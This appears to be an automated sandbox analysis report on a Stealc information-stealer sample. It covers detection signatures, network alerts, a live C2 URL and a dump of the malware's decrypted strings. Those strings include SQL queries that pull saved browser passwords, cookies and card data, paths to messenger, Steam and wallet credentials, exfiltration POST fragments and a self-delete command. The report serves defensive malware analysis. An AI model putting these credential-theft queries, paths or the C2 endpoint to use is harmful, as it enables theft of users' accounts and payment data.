
Windows Analysis Report
lxEu3xfjIb.exe

Overview

General Information

Sample name: lxEu3xfjIb.exe (renamed because the original name is a hash value)
Original sample name: bb99cde9173ee6e21b61963f6a4a60da.exe
Analysis ID: 1546917
MD5: bb99cde9173ee6e21b61963f6a4a60da
SHA1: 2bcff0eba69c4592e4d2959e8a2e35fc35416338
SHA256: c40ada473bd3a23569dd60807fa9754f2917c029e28746e7c1a32568d801dbfe
Tags: exe, Stealc, user-abuse_ch

Detection

Stealc
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Detected unpacking (changes PE section rights)
Detected unpacking (overwrites its own PE header)
Found malware configuration
Malicious sample detected (through community Yara rule)
Suricata IDS alerts for network traffic
Yara detected Powershell download and execute
Yara detected Stealc
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found evasive API chain (may stop execution after checking locale)
Machine Learning detection for sample
Sample uses string decryption to hide its real strings
Searches for specific processes (likely to inject)
AV process strings found (often used to terminate AV products)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to create guard pages, often used to hinder reverse engineering and debugging
Contains functionality to dynamically determine API calls
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Detected potential crypto function
Extensive use of GetProcAddress (often used to hide API calls)
Found evaded block containing many API calls
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
Internet Provider seen in connection with other malware
One or more processes crash
Queries the volume information (name, serial number etc) of a device
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

  • System is w10x64
  • lxEu3xfjIb.exe (PID: 1436 cmdline: "C:\Users\user\Desktop\lxEu3xfjIb.exe" MD5: BB99CDE9173EE6E21B61963F6A4A60DA)
    • WerFault.exe (PID: 2124 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 1436 -s 1052 MD5: C31336C1EFC2CCB44B4326EA793040F2)
  • cleanup
Name: Stealc
Description: Stealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, Stealc is a non-resident stealer with flexible data collection settings, and its development relied on other prominent stealers: Vidar, Raccoon, Mars and Redline. Stealc is written in C and uses WinAPI functions. It mainly targets data from web browsers, browser extensions and desktop cryptocurrency wallet applications, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers: sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests.
Attribution: No Attribution
Blogpost URLs: https://malpedia.caad.fkie.fraunhofer.de/details/win.stealc

Extracted malware configuration: {"C2 url": "http://95.215.207.176/d8ddb681db736e16.php", "Botnet": "LogsDiller"}
Yara matches: network traffic
Source: dump.pcap | Rule: JoeSecurity_Stealc_1 | Description: Yara detected Stealc | Author: Joe Security

Yara matches: memory dumps
Source: 00000000.00000002.2288542652.0000000002C99000.00000004.00000020.00020000.00000000.sdmp | Rule: JoeSecurity_Stealc | Description: Yara detected Stealc | Author: Joe Security
Source: 00000000.00000002.2288500521.0000000002C23000.00000040.00000020.00020000.00000000.sdmp | Rule: Windows_Trojan_RedLineStealer_ed346e4c | Description: unknown | Author: unknown
  • Matched string 0xd98:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
Source: 00000000.00000002.2287319130.0000000000400000.00000040.00000001.01000000.00000003.sdmp | Rule: JoeSecurity_Stealc | Description: Yara detected Stealc | Author: Joe Security
Source: 00000000.00000003.2088127603.0000000004920000.00000004.00001000.00020000.00000000.sdmp | Rule: JoeSecurity_Stealc | Description: Yara detected Stealc | Author: Joe Security
Source: 00000000.00000002.2288724291.0000000004840000.00000040.00001000.00020000.00000000.sdmp | Rule: JoeSecurity_Stealc | Description: Yara detected Stealc | Author: Joe Security
(4 further entries are collapsed in the original report)

Yara matches: unpacked PEs
Source: 0.3.lxEu3xfjIb.exe.4920000.1.unpack | Rule: JoeSecurity_Stealc | Description: Yara detected Stealc | Author: Joe Security
Source: 0.2.lxEu3xfjIb.exe.4840e67.2.raw.unpack | Rule: JoeSecurity_Stealc | Description: Yara detected Stealc | Author: Joe Security
Source: 0.2.lxEu3xfjIb.exe.4840e67.2.unpack | Rule: JoeSecurity_Stealc | Description: Yara detected Stealc | Author: Joe Security
Source: 0.2.lxEu3xfjIb.exe.400000.0.raw.unpack | Rule: JoeSecurity_Stealc | Description: Yara detected Stealc | Author: Joe Security
Source: 0.2.lxEu3xfjIb.exe.400000.0.unpack | Rule: JoeSecurity_Stealc | Description: Yara detected Stealc | Author: Joe Security
(1 further entry is collapsed in the original report)

No Sigma rule has matched

Suricata IDS alerts
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-11-01T17:44:19.423355+0100 | 2022930 | 1 | A Network Trojan was detected | 20.109.210.53 | 443 | 192.168.2.5 | 49720 | TCP
2024-11-01T17:44:47.675345+0100 | 2022930 | 1 | A Network Trojan was detected | 20.109.210.53 | 443 | 192.168.2.5 | 59725 | TCP
2024-11-01T17:44:05.331408+0100 | 2044243 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49704 | 95.215.207.176 | 80 | TCP


                      AV Detection

Source: lxEu3xfjIb.exe | Avira: detected
Source: 00000000.00000003.2088127603.0000000004920000.00000004.00001000.00020000.00000000.sdmp | Malware Configuration Extractor: StealC {"C2 url": "http://95.215.207.176/d8ddb681db736e16.php", "Botnet": "LogsDiller"}
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
Source: lxEu3xfjIb.exe | Joe Sandbox ML: detected
Source: 0.3.lxEu3xfjIb.exe.4920000.1.raw.unpack | String decryptor (one decrypted string per entry):
  • INSERT_KEY_HERE
  • 22
  • 11
  • 20
  • 24
  • GetProcAddress
  • LoadLibraryA
  • lstrcatA
  • OpenEventA
  • CreateEventA
  • CloseHandle
  • Sleep
  • GetUserDefaultLangID
  • VirtualAllocExNuma
  • VirtualFree
  • GetSystemInfo
  • VirtualAlloc
  • HeapAlloc
  • GetComputerNameA
  • lstrcpyA
  • GetProcessHeap
  • GetCurrentProcess
  • lstrlenA
  • ExitProcess
  • GlobalMemoryStatusEx
  • GetSystemTime
  • SystemTimeToFileTime
  • advapi32.dll
  • gdi32.dll
  • user32.dll
  • crypt32.dll
  • ntdll.dll
  • GetUserNameA
  • CreateDCA
  • GetDeviceCaps
  • ReleaseDC
  • CryptStringToBinaryA
  • sscanf
  • VMwareVMware
  • HAL9TH
  • JohnDoe
  • DISPLAY
  • %hu/%hu/%hu
  • http://95.215.207.176
  • gjtwvm
  • /d8ddb681db736e16.php
  • /70d63ca8a5be6cc3/
  • LogsDiller
  • GetEnvironmentVariableA
  • GetFileAttributesA
  • GlobalLock
  • HeapFree
  • GetFileSize
  • GlobalSize
  • CreateToolhelp32Snapshot
  • IsWow64Process
  • Process32Next
  • GetLocalTime
  • FreeLibrary
  • GetTimeZoneInformation
  • GetSystemPowerStatus
  • GetVolumeInformationA
  • GetWindowsDirectoryA
  • Process32First
  • GetLocaleInfoA
  • GetUserDefaultLocaleName
  • GetModuleFileNameA
  • DeleteFileA
  • FindNextFileA
  • LocalFree
  • FindClose
  • SetEnvironmentVariableA
  • LocalAlloc
  • GetFileSizeEx
  • ReadFile
  • SetFilePointer
  • WriteFile
  • CreateFileA
  • FindFirstFileA
  • CopyFileA
  • VirtualProtect
  • GetLogicalProcessorInformationEx
  • GetLastError
  • lstrcpynA
  • MultiByteToWideChar
  • GlobalFree
  • WideCharToMultiByte
  • GlobalAlloc
  • OpenProcess
  • TerminateProcess
  • GetCurrentProcessId
  • gdiplus.dll
  • ole32.dll
  • bcrypt.dll
  • wininet.dll
  • shlwapi.dll
  • shell32.dll
  • psapi.dll
  • rstrtmgr.dll
  • CreateCompatibleBitmap
  • SelectObject
  • BitBlt
  • DeleteObject
  • CreateCompatibleDC
  • GdipGetImageEncodersSize
  • GdipGetImageEncoders
  • GdipCreateBitmapFromHBITMAP
  • GdiplusStartup
  • GdiplusShutdown
  • GdipSaveImageToStream
  • GdipDisposeImage
  • GdipFree
  • GetHGlobalFromStream
  • CreateStreamOnHGlobal
  • CoUninitialize
  • CoInitialize
  • CoCreateInstance
  • BCryptGenerateSymmetricKey
  • BCryptCloseAlgorithmProvider
  • BCryptDecrypt
  • BCryptSetProperty
  • BCryptDestroyKey
  • BCryptOpenAlgorithmProvider
  • GetWindowRect
  • GetDesktopWindow
  • GetDC
  • CloseWindow
  • wsprintfA
  • EnumDisplayDevicesA
  • GetKeyboardLayoutList
  • CharToOemW
  • wsprintfW
  • RegQueryValueExA
  • RegEnumKeyExA
  • RegOpenKeyExA
  • RegCloseKey
  • RegEnumValueA
  • CryptBinaryToStringA
  • CryptUnprotectData
  • SHGetFolderPathA
  • ShellExecuteExA
  • InternetOpenUrlA
  • InternetConnectA
  • InternetCloseHandle
  • InternetOpenA
  • HttpSendRequestA
  • HttpOpenRequestA
  • InternetReadFile
  • InternetCrackUrlA
  • StrCmpCA
  • StrStrA
  • StrCmpCW
  • PathMatchSpecA
  • GetModuleFileNameExA
  • RmStartSession
  • RmRegisterResources
  • RmGetList
  • RmEndSession
  • sqlite3_open
  • sqlite3_prepare_v2
  • sqlite3_step
  • sqlite3_column_text
  • sqlite3_finalize
  • sqlite3_close
  • sqlite3_column_bytes
  • sqlite3_column_blob
  • encrypted_key
  • PATH
  • C:\ProgramData\nss3.dll
  • NSS_Init
  • NSS_Shutdown
  • PK11_GetInternalKeySlot
  • PK11_FreeSlot
  • PK11_Authenticate
  • PK11SDR_Decrypt
  • C:\ProgramData\
  • SELECT origin_url, username_value, password_value FROM logins
  • browser:
  • profile:
  • url:
  • login:
  • password:
  • Opera
  • OperaGX
  • Network
  • cookies
  • .txt
  • SELECT HOST_KEY, is_httponly, path, is_secure, (expires_utc/1000000)-11644480800, name, encrypted_value from cookies
  • TRUE
  • FALSE
  • autofill
  • SELECT name, value FROM autofill
  • history
  • SELECT url FROM urls LIMIT 1000
  • cc
  • SELECT name_on_card, expiration_month, expiration_year, card_number_encrypted FROM credit_cards
  • name:
  • month:
  • year:
  • card:
  • Cookies
  • Login Data
  • Web Data
  • History
  • logins.json
  • formSubmitURL
  • usernameField
  • encryptedUsername
  • encryptedPassword
  • guid
  • SELECT host, isHttpOnly, path, isSecure, expiry, name, value FROM moz_cookies
  • SELECT fieldname, value FROM moz_formhistory
  • SELECT url FROM moz_places LIMIT 1000
  • cookies.sqlite
  • formhistory.sqlite
  • places.sqlite
  • plugins
  • Local Extension Settings
  • Sync Extension Settings
  • IndexedDB
  • Opera Stable
  • Opera GX Stable
  • CURRENT
  • chrome-extension_
  • _0.indexeddb.leveldb
  • Local State
  • profiles.ini
  • chrome
  • opera
  • firefox
  • wallets
  • %08lX%04lX%lu
  • SOFTWARE\Microsoft\Windows NT\CurrentVersion
  • ProductName
  • x32
  • x64
  • %d/%d/%d %d:%d:%d
  • HARDWARE\DESCRIPTION\System\CentralProcessor\0
  • ProcessorNameString
  • SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
  • DisplayName
  • DisplayVersion
  • Network Info:
  • - IP: IP?
  • - Country: ISO?
  • System Summary:
  • - HWID:
  • - OS:
  • - Architecture:
  • - UserName:
  • - Computer Name:
  • - Local Time:
  • - UTC:
  • - Language:
  • - Keyboards:
  • - Laptop:
  • - Running Path:
  • - CPU:
  • - Threads:
  • - Cores:
  • - RAM:
  • - Display Resolution:
  • - GPU:
  • User Agents:
  • Installed Apps:
  • All Users:
  • Current User:
                      Source: 0.3.lxEu3xfjIb.exe.4920000.1.raw.unpackString decryptor: Process List:
                      Source: 0.3.lxEu3xfjIb.exe.4920000.1.raw.unpackString decryptor: system_info.txt
                      Source: 0.3.lxEu3xfjIb.exe.4920000.1.raw.unpackString decryptor: freebl3.dll
                      Source: 0.3.lxEu3xfjIb.exe.4920000.1.raw.unpackString decryptor: mozglue.dll
                      Source: 0.3.lxEu3xfjIb.exe.4920000.1.raw.unpackString decryptor: msvcp140.dll
                      Source: 0.3.lxEu3xfjIb.exe.4920000.1.raw.unpackString decryptor: nss3.dll
                      Source: 0.3.lxEu3xfjIb.exe.4920000.1.raw.unpackString decryptor: softokn3.dll
                      Source: 0.3.lxEu3xfjIb.exe.4920000.1.raw.unpackString decryptor: vcruntime140.dll
                      Source: 0.3.lxEu3xfjIb.exe.4920000.1.raw.unpackString decryptor: \Temp\
                      Source: 0.3.lxEu3xfjIb.exe.4920000.1.raw.unpackString decryptor: .exe
                      Source: 0.3.lxEu3xfjIb.exe.4920000.1.raw.unpackString decryptor: runas
                      Source: 0.3.lxEu3xfjIb.exe.4920000.1.raw.unpackString decryptor: open
                      Source: 0.3.lxEu3xfjIb.exe.4920000.1.raw.unpackString decryptor: /c start
                      Source: 0.3.lxEu3xfjIb.exe.4920000.1.raw.unpackString decryptor: %DESKTOP%
                      Source: 0.3.lxEu3xfjIb.exe.4920000.1.raw.unpackString decryptor: %APPDATA%
                      Source: 0.3.lxEu3xfjIb.exe.4920000.1.raw.unpackString decryptor: %LOCALAPPDATA%
                      Source: 0.3.lxEu3xfjIb.exe.4920000.1.raw.unpackString decryptor: %USERPROFILE%
                      Source: 0.3.lxEu3xfjIb.exe.4920000.1.raw.unpackString decryptor: %DOCUMENTS%
                      Source: 0.3.lxEu3xfjIb.exe.4920000.1.raw.unpackString decryptor: %PROGRAMFILES%
                      Source: 0.3.lxEu3xfjIb.exe.4920000.1.raw.unpackString decryptor: %PROGRAMFILES_86%
                      Source: 0.3.lxEu3xfjIb.exe.4920000.1.raw.unpackString decryptor: %RECENT%
                      Source: 0.3.lxEu3xfjIb.exe.4920000.1.raw.unpackString decryptor: *.lnk
                      Source: 0.3.lxEu3xfjIb.exe.4920000.1.raw.unpackString decryptor: files
                      Source: 0.3.lxEu3xfjIb.exe.4920000.1.raw.unpackString decryptor: \discord\
                      Source: 0.3.lxEu3xfjIb.exe.4920000.1.raw.unpackString decryptor: \Local Storage\leveldb\CURRENT
                      Source: 0.3.lxEu3xfjIb.exe.4920000.1.raw.unpackString decryptor: \Local Storage\leveldb
                      Source: 0.3.lxEu3xfjIb.exe.4920000.1.raw.unpackString decryptor: \Telegram Desktop\
                      Source: 0.3.lxEu3xfjIb.exe.4920000.1.raw.unpackString decryptor: key_datas
                      Source: 0.3.lxEu3xfjIb.exe.4920000.1.raw.unpackString decryptor: D877F783D5D3EF8C*
                      Source: 0.3.lxEu3xfjIb.exe.4920000.1.raw.unpackString decryptor: map*
                      Source: 0.3.lxEu3xfjIb.exe.4920000.1.raw.unpackString decryptor: A7FDF864FBC10B77*
                      Source: 0.3.lxEu3xfjIb.exe.4920000.1.raw.unpackString decryptor: A92DAA6EA6F891F2*
                      Source: 0.3.lxEu3xfjIb.exe.4920000.1.raw.unpackString decryptor: F8806DD0C461824F*
                      Source: 0.3.lxEu3xfjIb.exe.4920000.1.raw.unpackString decryptor: Telegram
                      Source: 0.3.lxEu3xfjIb.exe.4920000.1.raw.unpackString decryptor: Tox
                      Source: 0.3.lxEu3xfjIb.exe.4920000.1.raw.unpackString decryptor: *.tox
                      Source: 0.3.lxEu3xfjIb.exe.4920000.1.raw.unpackString decryptor: *.ini
                      Source: 0.3.lxEu3xfjIb.exe.4920000.1.raw.unpackString decryptor: Password
                      Source: 0.3.lxEu3xfjIb.exe.4920000.1.raw.unpackString decryptor: Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\
                      Source: 0.3.lxEu3xfjIb.exe.4920000.1.raw.unpackString decryptor: Software\Microsoft\Office\13.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\
                      Source: 0.3.lxEu3xfjIb.exe.4920000.1.raw.unpackString decryptor: Software\Microsoft\Office\14.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\
                      Source: 0.3.lxEu3xfjIb.exe.4920000.1.raw.unpackString decryptor: Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\
                      Source: 0.3.lxEu3xfjIb.exe.4920000.1.raw.unpackString decryptor: Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\
                      Source: 0.3.lxEu3xfjIb.exe.4920000.1.raw.unpackString decryptor: oftware\Microsoft\Windows Messaging Subsystem\Profiles\9375CFF0413111d3B88A00104B2A6676\
                      Source: 0.3.lxEu3xfjIb.exe.4920000.1.raw.unpackString decryptor: 00000001
                      Source: 0.3.lxEu3xfjIb.exe.4920000.1.raw.unpackString decryptor: 00000002
                      Source: 0.3.lxEu3xfjIb.exe.4920000.1.raw.unpackString decryptor: 00000003
                      Source: 0.3.lxEu3xfjIb.exe.4920000.1.raw.unpackString decryptor: 00000004
                      Source: 0.3.lxEu3xfjIb.exe.4920000.1.raw.unpackString decryptor: \Outlook\accounts.txt
                      Source: 0.3.lxEu3xfjIb.exe.4920000.1.raw.unpackString decryptor: Pidgin
                      Source: 0.3.lxEu3xfjIb.exe.4920000.1.raw.unpackString decryptor: \.purple\
                      Source: 0.3.lxEu3xfjIb.exe.4920000.1.raw.unpackString decryptor: accounts.xml
                      Source: 0.3.lxEu3xfjIb.exe.4920000.1.raw.unpackString decryptor: dQw4w9WgXcQ
                      Source: 0.3.lxEu3xfjIb.exe.4920000.1.raw.unpackString decryptor: token:
                      Source: 0.3.lxEu3xfjIb.exe.4920000.1.raw.unpackString decryptor: Software\Valve\Steam
                      Source: 0.3.lxEu3xfjIb.exe.4920000.1.raw.unpackString decryptor: SteamPath
                      Source: 0.3.lxEu3xfjIb.exe.4920000.1.raw.unpackString decryptor: \config\
                      Source: 0.3.lxEu3xfjIb.exe.4920000.1.raw.unpackString decryptor: ssfn*
                      Source: 0.3.lxEu3xfjIb.exe.4920000.1.raw.unpackString decryptor: config.vdf
                      Source: 0.3.lxEu3xfjIb.exe.4920000.1.raw.unpackString decryptor: DialogConfig.vdf
                      Source: 0.3.lxEu3xfjIb.exe.4920000.1.raw.unpackString decryptor: DialogConfigOverlay*.vdf
                      Source: 0.3.lxEu3xfjIb.exe.4920000.1.raw.unpackString decryptor: libraryfolders.vdf
                      Source: 0.3.lxEu3xfjIb.exe.4920000.1.raw.unpackString decryptor: loginusers.vdf
                      Source: 0.3.lxEu3xfjIb.exe.4920000.1.raw.unpackString decryptor: \Steam\
                      Source: 0.3.lxEu3xfjIb.exe.4920000.1.raw.unpackString decryptor: sqlite3.dll
                      Source: 0.3.lxEu3xfjIb.exe.4920000.1.raw.unpackString decryptor: browsers
                      Source: 0.3.lxEu3xfjIb.exe.4920000.1.raw.unpackString decryptor: done
                      Source: 0.3.lxEu3xfjIb.exe.4920000.1.raw.unpackString decryptor: soft
                      Source: 0.3.lxEu3xfjIb.exe.4920000.1.raw.unpackString decryptor: \Discord\tokens.txt
                      Source: 0.3.lxEu3xfjIb.exe.4920000.1.raw.unpackString decryptor: /c timeout /t 5 & del /f /q "
                      Source: 0.3.lxEu3xfjIb.exe.4920000.1.raw.unpackString decryptor: " & del "C:\ProgramData\*.dll"" & exit
                      Source: 0.3.lxEu3xfjIb.exe.4920000.1.raw.unpackString decryptor: C:\Windows\system32\cmd.exe
                      Source: 0.3.lxEu3xfjIb.exe.4920000.1.raw.unpackString decryptor: https
                      Source: 0.3.lxEu3xfjIb.exe.4920000.1.raw.unpackString decryptor: Content-Type: multipart/form-data; boundary=----
                      Source: 0.3.lxEu3xfjIb.exe.4920000.1.raw.unpackString decryptor: POST
                      Source: 0.3.lxEu3xfjIb.exe.4920000.1.raw.unpackString decryptor: HTTP/1.1
                      Source: 0.3.lxEu3xfjIb.exe.4920000.1.raw.unpackString decryptor: Content-Disposition: form-data; name="
                      Source: 0.3.lxEu3xfjIb.exe.4920000.1.raw.unpackString decryptor: hwid
                      Source: 0.3.lxEu3xfjIb.exe.4920000.1.raw.unpackString decryptor: build
                      Source: 0.3.lxEu3xfjIb.exe.4920000.1.raw.unpackString decryptor: token
                      Source: 0.3.lxEu3xfjIb.exe.4920000.1.raw.unpackString decryptor: file_name
                      Source: 0.3.lxEu3xfjIb.exe.4920000.1.raw.unpackString decryptor: file
                      Source: 0.3.lxEu3xfjIb.exe.4920000.1.raw.unpackString decryptor: message
                      Source: 0.3.lxEu3xfjIb.exe.4920000.1.raw.unpackString decryptor: ABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890
                      Source: 0.3.lxEu3xfjIb.exe.4920000.1.raw.unpackString decryptor: screenshot.jpg
                      Source: C:\Users\user\Desktop\lxEu3xfjIb.exeCode function: 0_2_00419030 CryptBinaryToStringA,GetProcessHeap,HeapAlloc,CryptBinaryToStringA,0_2_00419030
                      Source: C:\Users\user\Desktop\lxEu3xfjIb.exeCode function: 0_2_0040C920 memset,lstrlenA,CryptStringToBinaryA,memcpy,lstrcatA,lstrcatA,lstrcatA,0_2_0040C920
                      Source: C:\Users\user\Desktop\lxEu3xfjIb.exeCode function: 0_2_0040A210 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,0_2_0040A210
                      Source: C:\Users\user\Desktop\lxEu3xfjIb.exeCode function: 0_2_004072A0 GetProcessHeap,HeapAlloc,CryptUnprotectData,WideCharToMultiByte,LocalFree,0_2_004072A0
                      Source: C:\Users\user\Desktop\lxEu3xfjIb.exeCode function: 0_2_0040A2B0 CryptUnprotectData,LocalAlloc,memcpy,LocalFree,0_2_0040A2B0
                      Source: C:\Users\user\Desktop\lxEu3xfjIb.exeCode function: 0_2_0484A477 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,0_2_0484A477
                      Source: C:\Users\user\Desktop\lxEu3xfjIb.exeCode function: 0_2_04847507 GetProcessHeap,RtlAllocateHeap,CryptUnprotectData,WideCharToMultiByte,LocalFree,0_2_04847507
                      Source: C:\Users\user\Desktop\lxEu3xfjIb.exeCode function: 0_2_0484A517 CryptUnprotectData,LocalAlloc,memcpy,LocalFree,0_2_0484A517
                      Source: C:\Users\user\Desktop\lxEu3xfjIb.exeCode function: 0_2_04859297 CryptBinaryToStringA,GetProcessHeap,RtlAllocateHeap,CryptBinaryToStringA,0_2_04859297
                      Source: C:\Users\user\Desktop\lxEu3xfjIb.exeCode function: 0_2_0484CB87 memset,lstrlen,CryptStringToBinaryA,memcpy,lstrcat,lstrcat,lstrcat,0_2_0484CB87

                      Compliance

                      barindex
                      Source: C:\Users\user\Desktop\lxEu3xfjIb.exe | Unpacked PE file: 0.2.lxEu3xfjIb.exe.400000.0.unpack
                      Source: lxEu3xfjIb.exe | Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
                      Source: C:\Users\user\Desktop\lxEu3xfjIb.exe | File opened: C:\Windows\SysWOW64\msvcr100.dll
                      Source: Binary string: my_library.pdbU | source: lxEu3xfjIb.exe, 00000000.00000002.2288724291.0000000004840000.00000040.00001000.00020000.00000000.sdmp, lxEu3xfjIb.exe, 00000000.00000002.2287319130.0000000000400000.00000040.00000001.01000000.00000003.sdmp, lxEu3xfjIb.exe, 00000000.00000003.2088127603.0000000004920000.00000004.00001000.00020000.00000000.sdmp
                      Source: Binary string: my_library.pdb | source: lxEu3xfjIb.exe, lxEu3xfjIb.exe, 00000000.00000002.2288724291.0000000004840000.00000040.00001000.00020000.00000000.sdmp, lxEu3xfjIb.exe, 00000000.00000002.2287319130.0000000000400000.00000040.00000001.01000000.00000003.sdmp, lxEu3xfjIb.exe, 00000000.00000003.2088127603.0000000004920000.00000004.00001000.00020000.00000000.sdmp
                      Source: C:\Users\user\Desktop\lxEu3xfjIb.exe | Code function: 0_2_004140F0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,FindNextFileA,FindClose | 0_2_004140F0
                      Source: C:\Users\user\Desktop\lxEu3xfjIb.exe | Code function: 0_2_0040E530 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA | 0_2_0040E530
                      Source: C:\Users\user\Desktop\lxEu3xfjIb.exe | Code function: 0_2_0040BE40 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,memset,lstrcatA,lstrcatA,lstrcatA,memset,lstrcatA,lstrcatA,lstrcatA,memset,lstrcatA,lstrcatA,lstrcatA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose | 0_2_0040BE40
                      Source: C:\Users\user\Desktop\lxEu3xfjIb.exe | Code function: 0_2_0040EE20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlenA,DeleteFileA,CopyFileA,FindNextFileA,FindClose | 0_2_0040EE20
                      Source: C:\Users\user\Desktop\lxEu3xfjIb.exe | Code function: 0_2_00414B60 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,CopyFileA,DeleteFileA,FindNextFileA,FindClose | 0_2_00414B60
                      Source: C:\Users\user\Desktop\lxEu3xfjIb.exe | Code function: 0_2_00413B00 wsprintfA,FindFirstFileA,lstrcatA,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcatA,lstrlenA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose | 0_2_00413B00
                      Source: C:\Users\user\Desktop\lxEu3xfjIb.exe | Code function: 0_2_0040DF10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose | 0_2_0040DF10
                      Source: C:\Users\user\Desktop\lxEu3xfjIb.exe | Code function: 0_2_00401710 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose | 0_2_00401710
                      Source: C:\Users\user\Desktop\lxEu3xfjIb.exe | Code function: 0_2_004147C0 GetProcessHeap,HeapAlloc,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcatA,lstrcatA,lstrlenA,lstrlenA | 0_2_004147C0
                      Source: C:\Users\user\Desktop\lxEu3xfjIb.exe | Code function: 0_2_0040DB80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose | 0_2_0040DB80
                      Source: C:\Users\user\Desktop\lxEu3xfjIb.exe | Code function: 0_2_0040F7B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose | 0_2_0040F7B0
                      Source: C:\Users\user\Desktop\lxEu3xfjIb.exe | Code function: 0_2_0484E797 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA | 0_2_0484E797
                      Source: C:\Users\user\Desktop\lxEu3xfjIb.exe | Code function: 0_2_0484F087 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose | 0_2_0484F087
                      Source: C:\Users\user\Desktop\lxEu3xfjIb.exe | Code function: 0_2_0484C0A7 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,memset,lstrcat,lstrcat,lstrcat,memset,lstrcat,lstrcat,lstrcat,memset,lstrcat,lstrcat,lstrcat,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose | 0_2_0484C0A7
                      Source: C:\Users\user\Desktop\lxEu3xfjIb.exe | Code function: 0_2_0484E177 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose | 0_2_0484E177
                      Source: C:\Users\user\Desktop\lxEu3xfjIb.exe | Code function: 0_2_04854357 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose | 0_2_04854357
                      Source: C:\Users\user\Desktop\lxEu3xfjIb.exe | Code function: 0_2_04854DC7 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose | 0_2_04854DC7
                      Source: C:\Users\user\Desktop\lxEu3xfjIb.exe | Code function: 0_2_0484DDE7 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose | 0_2_0484DDE7
